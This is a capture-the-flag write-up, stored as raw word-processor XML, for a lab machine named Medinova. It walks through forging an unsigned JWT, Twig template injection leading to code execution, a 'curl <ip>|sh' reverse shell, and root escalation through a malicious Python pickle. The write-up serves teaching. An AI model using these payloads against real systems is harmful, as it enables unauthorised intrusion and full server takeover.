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MEDINOVA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hrrippluq3cn"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6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7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notice that we are redirected to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">medinova.hc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so we will need to map the IP address to the domain name by adding a line to the hosts file, as illustrated in the image above:</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6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5"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application again, we can observe that it is an application dedicated to medical consultations.</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navigating to the Consultation section, it is possible to log in. However, since we do not have credentials, we can log in as a guest user.</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27400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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observe that we were redirected to another page where we can fill in some information to schedule an appointment.</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Another intriguing detail on the page is the presence of “Welcome Guest.” Therefore, when examining our cookie, we can see that a JWT token was set.</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02000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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8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inspecting our JWT token on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jwt.io</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can assume that the application retrieves the name “guest” from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claim present in the JWT and displays it on the page.</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54400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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explore vulnerabilities centered around JWT. In this context, we can begin by exploring a vulnerability known as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“JWT None algorithm”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which occurs when we configure the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">alg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as </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none"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. By doing so, we can modify other claims present in the JWT, such as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without needing the signing key, since the signature will no longer be verified.</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scenario, we can combine this vulnerability with another one, such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSTI (Server-Side Template Injection)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. As we can observe, this token does not contain any </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">role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claim. Therefore, SSTI makes more sense in this case.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decode the JWT, since it is just Base64-encoded JSON.</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decode the header and change </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">alg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"none"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Then, we repeat the same process for the payload, inserting </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{{7*7}}</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Finally, we encode both parts again in Base64.</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6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combine the two parts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header.payload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replace our original token with this new one.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Example:</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eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=.eyJ1c2VybmFtZSI6Int7Nyo3fX0iLCJpYXQiOjE3MDU0MjY2ODUsImV4cCI6MTcwNTUxMzA4NX0=.</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the new token and refreshing the page, we can observe that the application is vulnerable to SSTI, confirmed by the return value of 49.</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8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identified that the application is written in PHP (as indicated by the cookie name </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHPSESSID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), we can consult HackTricks and look for a specific payload to exploit SSTI in the Twig template engine.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#twig-php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}</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685800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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the new token containing our payload, we obtained RCE, as evidenced by the output of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54300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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insert a reverse shell payload to establish a reverse connection to the server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">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Create a file named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing our reverse shell payload.</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Host this file using a Python HTTP server.</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 to receive the connection.</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Insert the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl &lt;ip-vpn&gt;|sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exec </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">function of our SSTI payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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way, the command will make a request to our server. By default, it will fetch </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which contains our reverse shell payload. The pipe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will pass it to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, resulting in shell access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720"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{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("curl 10.0.11.123|sh")}}</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11200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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6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5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the new token and refreshing the page, we obtained shell access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">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s91eey2el08"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562100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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qh6uixm3p3tk" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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hc8yj49paybh" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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searching for the first flag and not finding it, we listed the home directory and observed the presence of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tom</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Everything indicates that we need to escalate privileges to this user.</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8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we identified the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">script.sh</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80"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71"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83"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35100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77"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7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shell access, we were able to retrieve the first flag located in Tom’s home directory.</w:t>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6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the first user flag, it is time to escalate privileges to obtain the final flag. For this, we need to escalate to the root user.</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observed that we have permission to execute: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/sbin/read_pickle_files </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with root privileges, without needing to provide the password.</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5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binary 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read_pickle_files</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> suggests that it may use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pickle.loads</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If so, it may be vulnerable to malicious deserialization. We can create a malicious serialized object:</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hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://davidhamann.de/2020/04/05/exploiting-python-pickle/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pickle</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os</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MyEvilPickle(object):</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 __reduce__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">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return (os.system, ('whoami',))</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evil_pickle_data = pickle.dumps(MyEvilPickle())</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with open("payload", "wb") as file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">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20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    file.write(evil_pickle_data)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">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summary, this code creates a malicious pickle payload that, when deserialized, executes the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</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7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using the vulnerable binary, we confirmed that our payload was successfully executed, as indicated by the output of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami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78"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modify our exploit to invoke a shell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/bin/bash</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instead of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, leveraging execution with root privileges to obtain a root shell.</w:t>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85"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76"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privileged shell, we can retrieve our final flag.</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60"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with that, the challenge is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId42" w:type="default"/>
      <w:headerReference r:id="rId43" w:type="first"/>
      <w:headerReference r:id="rId44" w:type="even"/>
      <w:footerReference r:id="rId45" w:type="default"/>
      <w:footerReference r:id="rId46" w:type="first"/>
      <w:footerReference r:id="rId4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7">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o"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9" name="image17.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image17.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8">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9">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7"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Medinova</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20.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.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4.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.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31.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://davidhamann.de/2020/04/05/exploiting-python-pickle/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#twig-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LPwkK8GsM6AFUOym8Mp9JCMgaQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmhycmlwcGx1cTNjbjIOaC5uczkxZWV5MmVsMDgyDmgucWg2dWl4bTNwM3RrMg5oLmhjOHlqNDlwYXliaDIOaC4xNzVmNWNzOTR6MG84AHIhMWxIUERLLWozWTlGN08zT1lhR3JCNkVmemFtSjVsZWlx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